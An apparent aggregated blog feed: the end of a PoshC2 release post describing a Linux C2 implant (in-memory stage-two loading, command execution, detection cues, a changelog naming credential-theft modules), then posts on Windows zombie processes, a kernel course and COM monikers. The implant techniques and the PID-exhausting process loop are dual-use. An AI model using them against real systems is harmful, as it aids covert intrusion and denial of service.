When the dropper is launched it parses the configuration and connects to the C2 server to obtain the second stage using the configured hosts and URLs.

Loading the Second Stage

Our main aim with the execution of the second stage was to be able to run it without writing any artifacts to disk, and to have something that was easy to develop and compile. Given the above goals, it also needed to be as portable as possible.

The easiest way to do this would be to create a shared library and use the dlopen() and dlsym() functions to load it and find the address of a function to call. Historically, dlopen() required a file to operate on, but as of kernel version 3.17 it is possible to use memfd_create to get a file descriptor for memory without requiring a writable mount point. However, there are two issues with that approach:

  • The musl standard library we are using (see below) doesn’t support dlopen as it doesn’t make sense in a context where everything is statically linked.
  • Ideally, we’d like to support kernels older than 3.17, as although it was released in 2014, we still come across older ones from time to time.
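
For reference, the memfd_create-based approach described above would have looked roughly like the sketch below. This is illustrative only – not the code the implant actually uses – and it assumes a glibc recent enough (2.27+) to expose the memfd_create() wrapper; the entry function name loopy is borrowed from the implant purely as an example.

#define _GNU_SOURCE
#include <sys/mman.h>
#include <dlfcn.h>
#include <stdio.h>
#include <unistd.h>

typedef int (*entry_fn)(void* config, void* api);

int load_stage_two(const void* buf, size_t len, void* config, void* api) {
    // back the in-memory library with an anonymous file (kernel >= 3.17)
    int fd = memfd_create("stage2", MFD_CLOEXEC);
    if (fd < 0)
        return -1;

    if (write(fd, buf, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }

    // dlopen() the anonymous file via /proc/self/fd
    char path[64];
    snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
    void* handle = dlopen(path, RTLD_NOW);
    close(fd);
    if (!handle)
        return -1;

    // locate and call the library's entry function
    entry_fn entry = (entry_fn)dlsym(handle, "loopy");
    return entry ? entry(config, api) : -1;
}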

Given these constraints, we implemented our own shared library loader in the dropper. More details can be found in the project readme, but at a high level it’s this:

  • Parses the stage two ELF header, and allocates memory as appropriate.
  • Copies segments into memory as required.
  • Carries out any relocations required (as specified in the relocations section).
  • Finds the address of our library’s entry function (we define this as loopy() because it, well, loops…).
  • Calls the library function with a pointer to a configuration object and a table of function pointers to common functions the second stage needs.

If you want to understand this process in more detail there is an excellent set of articles by Eli Bendersky that go through the process for load time relocation and position independent code.

In theory, the second stage could be any statically linked library, but we’ve not extensively tested the loader. In the future, we’d like to re-use this loader capability to allow additional modules to be delivered to the implant so you can bring your own tooling as needed (for example, network scanning or proxying).

At this point the second stage is now operating and can communicate with the C2, run commands, etc.

Compatibility

One of the key aims for the Linux implant was to make it operate on as many different distributions/versions as possible without needing to have any prior knowledge of what was running before deployment – something that can be difficult to achieve with a single binary.

Normally Linux binaries are “dynamically linked”, which means that when the program is run the OS runtime-linker (usually something like /lib/ld-linux-x86-64.so.2) finds and loads the shared libraries that are needed.

For example, running ldd /bin/ssh, which shows the linked library dependencies, demonstrates that it depends on a range of different system libraries to do things like cryptographic operations, DNS resolution, thread management, etc. This is convenient because your binaries end up being smaller as code is reused; however, it also means that your program will not run unless the specific version of the library you linked against at compile time is present on the target system.

Obviously, we can’t always guarantee what will be present on the systems we are deploying on, so to work around this the implant is “statically linked”. This means that the executable contains its code and all of the libraries that it needs to operate in one file and has no dependencies on anything other than the operating system kernel.

The key component that needs to be linked is the “standard library” which is the set of functions that are used to carry out common tasks like string/memory manipulation, and most importantly interface between your application and the OS kernel using the system call API. The most common standard library is the GNU C library (glibc), and this is what you will usually find on most Linux distributions. However, it is fairly large and can be difficult to successfully statically link. For this reason, we decided to use the musl library, which is designed to be simple, efficient and used to produce statically linked executables (for example as on Alpine Linux).

Because the implant comes in two parts, if there are any common dependencies (e.g., we use libcurl to make HTTPS requests) then they would normally have to be statically linked into each binary. This would obviously be inefficient as the process would end up having two copies of the library in memory, one from the dropper and one from the stage two, and the stage two would be unnecessarily large. Therefore, for the larger libraries like libcurl a set of function pointers are provided from the dropper when it executes the stage two, so it can take advantage of the libraries that were already linked into the dropper.
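
To make that hand-off a little more concrete, here is a rough sketch of what such a shared function table could look like. The structure layout and member names are illustrative only and do not reflect PoshC2’s actual interface – the real implant defines its own configuration and API table.

// Illustrative only. The dropper fills this in with functions it already has
// statically linked (libcurl in this example) and passes it, together with
// the configuration, to the stage-two entry point.
struct stage_two_api {
    void* (*curl_easy_init)(void);          // opaque CURL* shown as void*
    int   (*curl_easy_perform)(void*);      // CURLcode shown as int
    void  (*curl_easy_cleanup)(void*);
};

struct stage_two_config {
    const char* key;    // random key patched in at payload-generation time
    const char* uri;    // stage-two URI
};

// signature of the stage-two entry function ("loopy" in the implant)
typedef int (*stage_two_entry)(const struct stage_two_config*,
                               const struct stage_two_api*);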

The implant is built for x86 systems, as this means that it will run on both 32- and 64-bit operating systems. Other architectures (e.g., ARM) may follow.

Child Processes

Our implant would be pretty limited without the ability to execute other commands using the system shell. This is easily carried out using the popen() function call in the standard library which executes the given command and opens a pipe so the command’s output can be read. However, some commands (e.g. ping with default arguments) may not exit, and so our implant would “hang” reading the output forever. To get around this, we have written a custom popen() implementation that allows us to launch our subcommand in a custom process group and set an alarm using SIGALRM to kill it after a user-configurable timeout period. Any output written by the process is then read and returned to the C2. This does mean however that long running commands will be prematurely terminated.
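
A simplified sketch of such a timeout-bounded popen() replacement is shown below. This is not the implant’s actual code, just an illustration of the process-group plus SIGALRM approach described above.

#define _GNU_SOURCE
#include <signal.h>
#include <sys/wait.h>
#include <unistd.h>

static pid_t g_child_pgid;

static void on_alarm(int sig) {
    (void)sig;
    kill(-g_child_pgid, SIGKILL);          // kill the whole process group
}

// Run `cmd` via /bin/sh, capture its output into `out`, give up after `timeout` seconds.
ssize_t run_with_timeout(const char* cmd, char* out, size_t outlen, unsigned timeout) {
    int fds[2];
    if (pipe(fds) < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                        // child
        setpgid(0, 0);                     // place it in its own process group
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]); close(fds[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char*)NULL);
        _exit(127);
    }

    close(fds[1]);
    setpgid(pid, pid);                     // also set the group from the parent (avoids a race)
    g_child_pgid = pid;
    signal(SIGALRM, on_alarm);
    alarm(timeout);                        // SIGALRM kills the group on expiry

    ssize_t total = 0, n;
    while ((n = read(fds[0], out + total, outlen - total - 1)) > 0)
        total += n;
    out[total] = '\0';

    alarm(0);                              // cancel the alarm if we finished in time
    waitpid(pid, NULL, 0);
    close(fds[0]);
    return total;
}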

Detection

We typically find that Linux environments have a lot less scrutiny applied than their Windows counterparts. Nevertheless, they are often hosting critical services and data and so monitoring for suspicious or unusual behaviour should be considered. Many security vendors are starting to release monitoring agents for Linux, and several open-source tools are available.

A full exploration of security monitoring for Linux is out of scope for this post, but some things that might be seen when using this implant are:

  • Anomalous logins (for example SSH access at unusual times, or from an unusual location).
  • Vulnerability exploitation (for example, alerts in NIDS).
  • wget or curl being used to download files for execution.
  • Program execution from an unusual location (e.g. from a temporary directory or user’s home directory).
  • Changes to user or system cron entries.

The dropper itself has very limited operational security so we expect static detection of the binary by antivirus or NIDS to be relatively straightforward in this publicly released version.

It’s also worth reviewing the PoshC2 indicators of compromise listed at https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise.

Full Changelog

Many other updates and fixes have been added in this version and merged to dev, some of which are briefly summarized below. For updates and tips check out @nettitude_labs, @benpturner, @m0rv4i and @b4ggio-su on Twitter.

  • Miscellaneous fixes and refactoring
  • Fixed MSTHA and RegSvr32 quickstart payloads
  • Several runas and Daisy.dll related fixes
  • Improved PoshC2 reports output and style
  • Enforced the consistent use of UTC throughout
  • FComm related fixes
  • Added Native Linux implant and related functionalities from Joel Snape (@jdsnape)
  • Added Get-APICall & DisableEnvironmentExit in Core
  • Updated to psycopg2-binary so it’s not compiled from source
  • Database related fixes
  • RunPE integration
  • Added GetDllBaseAddress, FreeMemory, and RemoveDllBaseAddress in Core
  • Added C# Ping module from Leo Stavliotis (@lstavliotis)
  • Fixed fpc script on PostgreSQL
  • Added PrivescCheck.ps1 module
  • Added C# IPConfig module from Leo Stavliotis (@lstavliotis)
  • Updated several external modules, including Seatbelt, StandIn, Mimikatz
  • Added EventLogSearcher & Ldap-Searcher
  • Added C# NSLookup module from Leo Stavliotis (@lstavliotis)
  • Added getprocess in Core
  • Added findfile, getinstallerinfo, regread, lsreg, and curl in Core
  • Added GetGPPPassword & GetGPPGroups modules
  • Added Get-IdleTime to Core
  • Added PoshGrep option for commands
  • Added SharpChromium
  • Added DllSearcher to Core
  • Updated Dynamic-Code for PBind
  • Added RunOF capability into Posh along with several compiled situational awareness OFs
  • Updated Daisy Comms
  • Added C# SQLQuery module from Leo Stavliotis (@lstavliotis)
  • Added ATPMiniDump
  • Added rmdir, mkdir, zip, unzip & ntdsutil to Core
  • Fix failover retries for C# & Updated SharpDPAPI
  • Updated domain check case sensitivity in dropper
  • Fixed dropper rotation break
  • Added WMIExec and SMBExec modules
  • Added dcsync alias for Mimikatz
  • Added AES256 hash for uploaded files
  • Added RegSave module
  • SharpShadowCopy integration
  • Fixed and updated cookie decrypter script
  • Updated OPSEC Upload
  • Added FileGrep module
  • Added NetShareEnum to Core
  • Added StickyNotesExtract
  • Added SharpShares module
  • Added SharpPrintNightmare module
  • Added in memory SharpHound option
  • Updated Tasks.py to save Seatbelt output
  • Added kill-remote-process to Core
  • Fixed jxa_handler not being imported
  • Updated posh-update script to accept -x to skip install
  • Added process name in implant view from Lefteris Panos (@Lefterispan)
  • Added SharpReg module from Charley Celice (@kibercthulhu)
  • Added SharpTelnet module from Charley Celice (@kibercthulhu)
  • kill-process with no arguments now terminates the implant’s current process following a warning prompt
  • Added hide-dead-implants command
  • Added ability to modify user agent when creating new payloads from Kirk Hayes (@l0gan54k)
  • Added get-acl command in Core

Download now

GitHub: https://github.com/nettitude/PoshC2

The post Introducing PoshC2 v8.0 appeared first on Nettitude Labs.

Zombie Processes

14 May 2022 at 09:00

The term “Zombie Process” in Windows is not an official one, as far as I know. Regardless, I’ll define a zombie process to be a process that has exited (for whatever reason), but at least one reference remains to the kernel process object (EPROCESS), so that the process object cannot be destroyed.

How can we recognize zombie processes? Is this even important? Let’s find out.

All kernel objects are reference counted. The reference count includes the handle count (the number of open handles to the object), and a “pointer count”, the number of kernel clients to the object that have incremented its reference count explicitly so the object is not destroyed prematurely if all handles to it are closed.

Process objects are managed within the kernel by the EPROCESS (undocumented) structure, that contains or points to everything about the process – its handle table, image name, access token, job (if any), threads, address space, etc. When a process is done executing, some aspects of the process get destroyed immediately. For example, all handles in its handle table are closed; its address space is destroyed. General properties of the process remain, however, some of which only have true meaning once a process dies, such as its exit code.

Process enumeration tools such as Task Manager or Process Explorer don’t show zombie processes, simply because the process enumeration APIs (EnumProcesses, Process32First/Process32Next, the native NtQuerySystemInformation, and WTSEnumerateProcesses) don’t return these – they only return processes that can still run code. The kernel debugger, on the other hand, shows all processes, zombie or not, when you type something like !process 0 0. Identifying zombie processes is easy – their handle table and handle count are shown as zero. Here is one example:

kd> !process ffffc986a505a080 0
PROCESS ffffc986a505a080
    SessionId: 1  Cid: 1010    Peb: 37648ff000  ParentCid: 0588
    DirBase: 16484cd000  ObjectTable: 00000000  HandleCount:   0.
    Image: smartscreen.exe

Any kernel object referenced by the process object remains alive as well – such as a job (if the process is part of a job), and the process primary token (access token object). We can get more details about the process by passing the detail level “1” in the !process command:

lkd> !process ffffc986a505a080 1
PROCESS ffffc986a505a080
    SessionId: 1  Cid: 1010    Peb: 37648ff000  ParentCid: 0588
    DirBase: 16495cd000  ObjectTable: 00000000  HandleCount:   0.
    Image: smartscreen.exe
    VadRoot 0000000000000000 Vads 0 Clone 0 Private 16. Modified 7. Locked 0.
    DeviceMap ffffa2013f24aea0
    Token                             ffffa20147ded060
    ElapsedTime                       1 Day 15:11:50.174
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.015
    QuotaPoolUsage[PagedPool]         0
    QuotaPoolUsage[NonPagedPool]      0
    Working Set Sizes (now,min,max)  (17, 50, 345) (68KB, 200KB, 1380KB)
    PeakWorkingSetSize                2325
    VirtualSize                       0 Mb
    PeakVirtualSize                   2101341 Mb
    PageFaultCount                    2500
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      20
    Job                               ffffc98672eea060

Notice the address space does not exist anymore (VadRoot is zero). The VAD (Virtual Address Descriptor) tree is a data structure managed as a balanced binary search tree that describes the address space of a process – which parts are committed, which parts are reserved, etc. No address space exists anymore. Other details of the process are still there, as they are direct members of the EPROCESS structure, such as the kernel and user time the process has used, and its start and exit times (not shown in the debugger’s output above).

We can ask the debugger to show the reference count of any kernel object by using the generic !object command, to be followed by !trueref if there are handles open to the object:

lkd> !object ffffc986a505a080
Object: ffffc986a505a080  Type: (ffffc986478ce380) Process
    ObjectHeader: ffffc986a505a050 (new version)
    HandleCount: 1  PointerCount: 32768
lkd> !trueref ffffc986a505a080
ffffc986a505a080: HandleCount: 1 PointerCount: 32768 RealPointerCount: 1

Clearly, there is a single handle open to the process and that’s the only thing keeping it alive.

One other thing that remains is the unique process ID (shown as Cid in the above output). Process and thread IDs are generated by using a private handle table just for this purpose. This explains why process and thread IDs are always multiples of four, just like handles. In fact, the kernel treats PIDs and TIDs with the HANDLE type, rather than with something like ULONG. Since there is a limit to the number of handles in a process (16,711,680; the reason is not described here), that’s also the limit for the number of processes and threads that could exist on a system. This is a rather large number, so probably not an issue from a practical perspective, but zombie processes still keep their PIDs “taken”, so they cannot be reused. This means that in theory, some code could create millions of processes, terminate them all, but not close the handles it receives back, and eventually new processes could not be created anymore because PIDs (and TIDs) run out. I don’t know what would happen then 🙂

Here is a simple loop to do something like that by creating and destroying Notepad processes but keeping handles open:

WCHAR name[] = L"notepad";
STARTUPINFO si{ sizeof(si) };
PROCESS_INFORMATION pi;
int i = 0;
for (; i < 1000000; i++) {	// use 1 million as an example
	auto created = ::CreateProcess(nullptr, name, nullptr, nullptr,
        FALSE, 0, nullptr, nullptr, &si, &pi);
	if (!created)
		break;
	::TerminateProcess(pi.hProcess, 100);
	printf("Index: %6d PID: %u\n", i + 1, pi.dwProcessId);
	::CloseHandle(pi.hThread);
}
printf("Total: %d\n", i);

The code closes the handle to the first thread in the process, as keeping it alive would create “Zombie Threads”, much like zombie processes – threads that can no longer run any code, but still exist because at least one handle is keeping them alive.
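
For illustration, here is a minimal snippet (not part of the original example) showing how a zombie thread comes about – the thread exits, but the open handle keeps the kernel thread object alive:

DWORD WINAPI DoNothing(PVOID) { return 0; }

void CreateZombieThread() {
	HANDLE hThread = ::CreateThread(nullptr, 0, DoNothing, nullptr, 0, nullptr);
	::WaitForSingleObject(hThread, INFINITE);	// the thread has exited by now...
	// ...but hThread is never closed, so the thread object lingers as a zombie
}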

How can we get a list of zombie processes on a system given that the “normal” tools for process enumeration don’t show them? One way of doing this is to enumerate all the process handles in the system, and check if the process pointed by that handle is truly alive by calling WaitForSingleObject on the handle (of course the handle must first be duplicated into our process so it’s valid to use) with a timeout of zero – we don’t want to wait really. If the result is WAIT_OBJECT_0, this means the process object is signaled, meaning it exited – it’s no longer capable of running any code. I have incorporated that into my Object Explorer (ObjExp.exe) tool. Here is the basic code to get details for zombie processes (the code for enumerating handles is not shown but is available in the source code):

m_Items.clear();
m_Items.reserve(128);
std::unordered_map<DWORD, size_t> processes;
for (auto const& h : ObjectManager::EnumHandles2(L"Process")) {
	auto hDup = ObjectManager::DupHandle(
        (HANDLE)(ULONG_PTR)h->HandleValue , h->ProcessId, 
        SYNCHRONIZE | PROCESS_QUERY_LIMITED_INFORMATION);
	if (hDup && WAIT_OBJECT_0 == ::WaitForSingleObject(hDup, 0)) {
		//
		// zombie process
		//
		auto pid = ::GetProcessId(hDup);
		if (pid) {
			auto it = processes.find(pid);
			ZombieProcess zp;
			auto& z = it == processes.end() ? zp : m_Items[it->second];
			z.Pid = pid;
			z.Handles.push_back({ h->HandleValue, h->ProcessId });
			WCHAR name[MAX_PATH];
			if (::GetProcessImageFileName(hDup, 
                name, _countof(name))) {
				z.FullPath = 
                    ProcessHelper::GetDosNameFromNtName(name);
				z.Name = wcsrchr(name, L'\\') + 1;
			}
			::GetProcessTimes(hDup, 
                (PFILETIME)&z.CreateTime, (PFILETIME)&z.ExitTime, 
                (PFILETIME)&z.KernelTime, (PFILETIME)&z.UserTime);
			::GetExitCodeProcess(hDup, &z.ExitCode);
			if (it == processes.end()) {
				m_Items.push_back(std::move(z));
				processes.insert({ pid, m_Items.size() - 1 });
			}
		}
	}
	if (hDup)
		::CloseHandle(hDup);
}

The data structure built for each process and stored in the m_Items vector is the following:

struct HandleEntry {
	ULONG Handle;
	DWORD Pid;
};
struct ZombieProcess {
	DWORD Pid;
	DWORD ExitCode{ 0 };
	std::wstring Name, FullPath;
	std::vector<HandleEntry> Handles;
	DWORD64 CreateTime, ExitTime, KernelTime, UserTime;
};

The ObjectManager::DupHandle function is not shown, but it basically calls DuplicateHandle for the process handle identified in some process. If that works, and the returned PID is non-zero, we can go do the work. Getting the process image name is done with GetProcessImageFileName – seems simple enough, but this function gets the NT name format of the executable (something like \Device\HarddiskVolume3\Windows\System32\Notepad.exe), which is good enough if only the “short” final image name component is desired. If the full image path is needed in Win32 format (e.g. “c:\Windows\System32\notepad.exe”), it must be converted (ProcessHelper::GetDosNameFromNtName). You might be thinking that it would be far simpler to call QueryFullProcessImageName and get the Win32 name directly – but this does not work, and the function fails. Internally, the NtQueryInformationProcess native API is called with ProcessImageFileNameWin32 in the latter case, which fails if the process is a zombie one.
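
For the curious, here is one way such a conversion can be implemented – a sketch only, not necessarily identical to the ProcessHelper::GetDosNameFromNtName code used by Object Explorer. It maps the \Device\HarddiskVolumeX prefix back to a drive letter by querying each drive’s underlying device name:

#include <Windows.h>
#include <wchar.h>
#include <string>

std::wstring NtPathToDosPath(const std::wstring& ntName) {
	WCHAR drives[512];
	if (!::GetLogicalDriveStringsW(_countof(drives), drives))
		return ntName;

	// drives is a multi-string: "C:\" "D:\" ... terminated by an empty string
	for (auto p = drives; *p; p += wcslen(p) + 1) {
		WCHAR root[] = { p[0], L':', 0 };		// e.g. "C:"
		WCHAR device[MAX_PATH];
		if (::QueryDosDeviceW(root, device, _countof(device))) {
			auto len = wcslen(device);
			if (ntName.size() > len && ntName[len] == L'\\' &&
				::_wcsnicmp(ntName.c_str(), device, len) == 0)
				return root + ntName.substr(len);	// "C:" + "\Windows\..."
		}
	}
	return ntName;	// no match found - return as-is
}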

Running Object Explorer and selecting Zombie Processes from the System menu shows a list of all zombie processes (you should run it elevated for best results):

Object Explorer showing zombie processes

The above screenshot shows that many of the zombie processes are kept alive by GameManagerService.exe. This executable is from Razer, running on my system. It definitely has a bug that keeps process handles alive way longer than needed. I’m not sure it would ever close these handles. Terminating this process will resolve the issue, as the kernel closes all handles in a process handle table once the process terminates. This will allow all those processes that are held by that single handle to be freed from memory.

I plan to add Zombie Threads to Object Explorer – I wonder how many threads are being kept “alive” without good reason.


zodiacon

Next Windows Kernel Programming Class

14 July 2022 at 12:13

I’m happy to announce the next 5-day virtual Windows Kernel Programming class to be held in October. The syllabus for the class can be found here. A notable addition to the class is an introduction to the Kernel Mode Driver Framework (KMDF).

Dates and Times (all in October 2022), times based on London:
11 (full day): 4pm to 12am
12 (full day): 4pm to 12am
13 (half day): 4pm to 8pm
17 (half day): 4pm to 8pm
18 (full day): 4pm to 12am
19 (half day): 4pm to 8pm
20 (half day): 4pm to 8pm

The class will be recorded and provided to the participants.

Cost:
900 USD if paid by an individual
1700 USD if paid by a company
Previous participants of my classes get 10% off. Multiple participants from the same company get a discount as well (talk to me).

Registration
To register, send email to [email protected] and provide the name(s) and email(s) of the participant(s), the company name (if any), and your time zone (for my information, although I cannot change course times).

Feel free to contact me for any questions or comments via email, twitter (@zodiacon) or Linkedin.

Introduction to Monikers

17 September 2022 at 22:02

The foundations of the Component Object Model (COM) are made of two principles:

  1. Clients program against interfaces, never concrete classes.
  2. Location transparency – clients need not know where the actual object is (in-process, out-of-process, another machine).

Although simple in principle, there are many details involved in COM, as those with COM experience are well aware. In this post, I’d like to introduce one extensibility aspect of COM called Monikers.

The idea of a moniker is to provide some way to identify and locate specific objects based on string names instead of some custom mechanism. Windows provides some implementations of monikers, most of which are related to Object Linking and Embedding (OLE), most notably used in Microsoft Office applications. For example, when an Excel chart is embedded in a Word document as a link, an Item moniker is used to point to that specific chart using a string with a specific format understood by the moniker mechanism and the specific monikers involved. This also suggests that monikers can be combined, which is indeed the case. For example, a cell in some Excel document can be located by going to a specific sheet, then a specific range, then a specific cell – each one could be pointed to by a moniker, that when chained together can locate the required object.

Let’s start with perhaps the simplest example of an existing moniker implementation – the Class moniker. This moniker can be used to replace a creation operation. Here is an example that creates a COM object using the “standard” mechanism of calling CoCreateInstance:

#include <shlobjidl.h>
//...
CComPtr<IShellWindows> spShell;
auto hr = spShell.CoCreateInstance(__uuidof(ShellWindows));

I use the ATL smart pointers (#include <atlcomcli.h> or <atlbase.h>). The interface and class I’m using is just an example – any standard COM class would work. The CoCreateInstance method calls the real CoCreateInstance. To make it clearer, here is the CoCreateInstance call without using the helper provided by the smart pointer:

CComPtr<IShellWindows> spShell;
auto hr = ::CoCreateInstance(__uuidof(ShellWindows), nullptr, 
    CLSCTX_ALL, __uuidof(IShellWindows), 
    reinterpret_cast<void**>(&spShell));

CoCreateInstance itself is a glorified wrapper for calling CoGetClassObject to retrieve a class factory, requesting the standard IClassFactory interface, and then calling CreateInstance on it:

CComPtr<IClassFactory> spCF;
auto hr = ::CoGetClassObject(__uuidof(ShellWindows), 
    CLSCTX_ALL, nullptr, __uuidof(IClassFactory), 
    reinterpret_cast<void**>(&spCF));
if (SUCCEEDED(hr)) {
    CComPtr<IShellWindows> spShell;
    hr = spCF->CreateInstance(nullptr, __uuidof(IShellWindows),
        reinterpret_cast<void**>(&spShell));
    if (SUCCEEDED(hr)) {
        // use spShell
    }
}

Here is where the Class moniker comes in: It’s possible to get a class factory directly using a string like so:

CComPtr<IClassFactory> spCF;
BIND_OPTS opts{ sizeof(opts) };
auto hr = ::CoGetObject(
    L"clsid:9BA05972-F6A8-11CF-A442-00A0C90A8F39", 
    &opts, __uuidof(IClassFactory), 
    reinterpret_cast<void**>(&spCF));

Using CoGetObject is the most convenient way in C++ to locate an object based on a moniker. The moniker name is the string provided to CoGetObject. It starts with a ProgID of sorts followed by a colon. The rest of the string is to be interpreted by the moniker behind the scenes. With the class factory in hand, the code can use IClassFactory::CreateInstance just as with the previous example.

How does it work? As is usual with COM, the Registry is involved. If you open RegEdit or TotalRegistry and navigate to HKEY_CLASSES_ROOT, ProgIDs are all there. One of them is “clsid” – yes, it’s a bit weird perhaps, but the entry point to the moniker system is that ProgID. Each ProgID should have a CLSID subkey pointing to the class ID of the moniker. So here, the key is HKCR\CLSID\CLSID!

Class Moniker Registration

Of course, other monikers have different names (not CLSID). If we follow the CLSID on the right to the normal location for COM CLSID registration (HKCR\CLSID), this is what we find:

Class moniker

And the InProcServer32 subkey points to Combase.dll, the DLL implementing the COM infrastructure:

Class Moniker Implementation

At this point, we know how the class moniker got discovered, but it’s still not clear what that moniker actually is and where it lives.

As mentioned earlier, CoGetObject is the simplest way to get an object from a moniker, as it hides the details of the moniker itself. CoGetObject is a shortcut for calling MkParseDisplayName – the real entry point to the COM moniker namespace. Here is the full way to get a class moniker by going through the moniker:

CComPtr<IMoniker> spClsMoniker;
CComPtr<IBindCtx> spBindCtx;
::CreateBindCtx(0, &spBindCtx);
ULONG eaten;
CComPtr<IClassFactory> spCF;
auto hr = ::MkParseDisplayName(
    spBindCtx,
    L"clsid:9BA05972-F6A8-11CF-A442-00A0C90A8F39",
    &eaten, &spClsMoniker);
if (SUCCEEDED(hr)) {
    spClsMoniker->BindToObject(spBindCtx, nullptr,
        __uuidof(IClassFactory), reinterpret_cast<void**>(&spCF));
}

MkParseDisplayName takes a “display name” – a string – and attempts to locate the moniker based on the information in the Registry (it actually has some special code for certain OLE stuff which is not interesting in this context). The Bind Context is a helper object that can (in the general case) contain an arbitrary set of properties that can be used by the moniker to customize the way it interprets the display name. The class moniker does not use any properties, but it’s still necessary to provide the object even if it has no interesting data in it. If successful, MkParseDisplayName returns the moniker interface pointer, implementing the IMoniker interface that all monikers must implement. IMoniker is a somewhat scary interface, having 20 methods (excluding IUnknown). Fortunately, not all have to be implemented. We’ll get to implementing our own moniker soon.

The primary method in IMoniker is BindToObject, which is tasked with interpreting the display name, if possible, and returning the real object that the client is trying to locate. The client provides the interface it expects the target object to implement – IClassFactory in the case of a class moniker.

You might be wondering what’s the point of the class moniker if you could simply create the required object directly with the normal class factory. One advantage of the moniker is that a string is involved, which allows “late binding” of sorts, and allows other languages, such as scripting languages, to create COM objects indirectly. For example, VBScript provides the GetObject function that calls CoGetObject.

Implementing a Moniker

Some details are still missing, such as how does the moniker object itself gets created? To show that, let’s implement our own moniker. We’ll call it the Process Moniker – its purpose is to locate a COM process object we’ll implement that allows working with a Windows Process object.

Here is an example of something a client would do to find a process object based on its PID, and then display its executable path:

BIND_OPTS opts{ sizeof(opts) };
CComPtr<IWinProcess> spProcess;
auto hr = ::CoGetObject(L"process:3284", 
    &opts, __uuidof(IWinProcess), 
    reinterpret_cast<void**>(&spProcess));
if (SUCCEEDED(hr)) {
    CComBSTR path;
    if (S_OK == spProcess->get_ImagePath(&path)) {
        printf("Image path: %ws\n", path.m_str);
    }
}

The IWinProcess is the interface our process object implements, but there is no need to know its CLSID (in fact, it has none, and is created privately by the moniker). The display name “process:3284” identifies the string “process” as the moniker name, meaning there must be a subkey under HKCR named “process” for this to have any chance of working. And under the “process” key there must be the CLSID of the moniker. Here is the final result:

process moniker

The CLSID of the process moniker must be registered normally like all COM classes. The text after the colon is passed to the moniker which should interpret it in a way that makes sense for that moniker (or fail trying). In our case, it’s supposed to be a PID of an existing process.

Let’s see the main steps needed to implement the process moniker. From a technical perspective, I created an ATL DLL project in Visual Studio (could be an EXE as well), and then added an “ATL Simple Object” class template to get the boilerplate code the ATL template provides. We just need to implement IMoniker – no need for some custom interface. Here is the layout of the class:

class ATL_NO_VTABLE CProcessMoniker :
	public CComObjectRootEx<CComMultiThreadModel>,
	public CComCoClass<CProcessMoniker, &CLSID_ProcessMoniker>,
	public IMoniker {
public:
	DECLARE_REGISTRY_RESOURCEID(106)
	DECLARE_CLASSFACTORY_EX(CMonikerClassFactory)

	BEGIN_COM_MAP(CProcessMoniker)
		COM_INTERFACE_ENTRY(IMoniker)
	END_COM_MAP()

	DECLARE_PROTECT_FINAL_CONSTRUCT()
	HRESULT FinalConstruct() {
		return S_OK;
	}
	void FinalRelease() {
	}

public:
	// Inherited via IMoniker
	HRESULT __stdcall GetClassID(CLSID* pClassID) override;
	HRESULT __stdcall IsDirty(void) override;
	HRESULT __stdcall Load(IStream* pStm) override;
	HRESULT __stdcall Save(IStream* pStm, BOOL fClearDirty) override;
	HRESULT __stdcall GetSizeMax(ULARGE_INTEGER* pcbSize) override;
	HRESULT __stdcall BindToObject(IBindCtx* pbc, IMoniker* pmkToLeft, REFIID riidResult, void** ppvResult) override;
    // other IMoniker methods...
	std::wstring m_DisplayName;
};

OBJECT_ENTRY_AUTO(__uuidof(ProcessMoniker), CProcessMoniker)

Those familiar with the typical code the ATL wizard generates might notice one important difference from the standard template: the class factory. It turns out that monikers are not created by an IClassFactory when called by a client invoking MkParseDisplayName (or its CoGetObject wrapper), but instead must implement the interface IParseDisplayName, which we’ll tackle in a moment. This is why DECLARE_CLASSFACTORY_EX(CMonikerClassFactory) is used to instruct ATL to use a custom class factory which we must implement.

MkParseDisplayName operation

Before we get to that, let’s implement the “main” method – BindToObject. We have to assume that the m_DisplayName member already has the process ID – it will be provided by our class factory that creates our moniker. First, we’ll convert the display name to a number:

HRESULT __stdcall CProcessMoniker::BindToObject(IBindCtx* pbc, IMoniker* pmkToLeft, REFIID riidResult, void** ppvResult) {
	auto pid = std::stoul(m_DisplayName);

Next, we’ll attempt to open a handle to the process:

auto hProcess = ::OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 
    FALSE, pid);
if (!hProcess)
    return HRESULT_FROM_WIN32(::GetLastError());

If we fail, we just return a failed HRESULT and we’re done. If successful, we can create the WinProcess object, pass the handle and return the interface requested by the client (if supported):

	CComObject<CWinProcess>* pProcess;
	auto hr = CComObject<CWinProcess>::CreateInstance(&pProcess);
	if (FAILED(hr)) {
		::CloseHandle(hProcess);
		return hr;
	}
	pProcess->SetHandle(hProcess);
	pProcess->AddRef();
	
	hr = pProcess->QueryInterface(riidResult, ppvResult);
	pProcess->Release();
	return hr;
}

The creation of the object is internal via CComObject<>. The WinProcess COM class is not registered, which is just a matter of choice. I decided that a WinProcess object can only be obtained through the Process Moniker.

The calls to AddRef/Release may be puzzling, but there is a good reason for using them. When creating a CComObject<> object, the reference count of the object is zero. Then, the call to AddRef increments it to 1. Next, if the QueryInterface call succeeds, the ref count is incremented to 2. Then, the Release call decrements it to 1, as that is the correct count when the object is returned to the client. If, however, the call to QI fails, the ref count remains at 1, and the Release call will destroy the object! More elegant than calling delete.

SetHandle is a function in CWinProcess (outside the IWinProcess interface) that passes the handle to the object.

The WinProcess COM class is the uninteresting part in all of this, so I created a bare-minimum class like so:

class ATL_NO_VTABLE CWinProcess :
	public CComObjectRootEx<CComMultiThreadModel>,
	public IDispatchImpl<IWinProcess> {
public:
	DECLARE_NO_REGISTRY()

	BEGIN_COM_MAP(CWinProcess)
		COM_INTERFACE_ENTRY(IWinProcess)
		COM_INTERFACE_ENTRY(IDispatch)
		COM_INTERFACE_ENTRY_AGGREGATE(IID_IMarshal, m_pUnkMarshaler.p)
	END_COM_MAP()

	DECLARE_PROTECT_FINAL_CONSTRUCT()
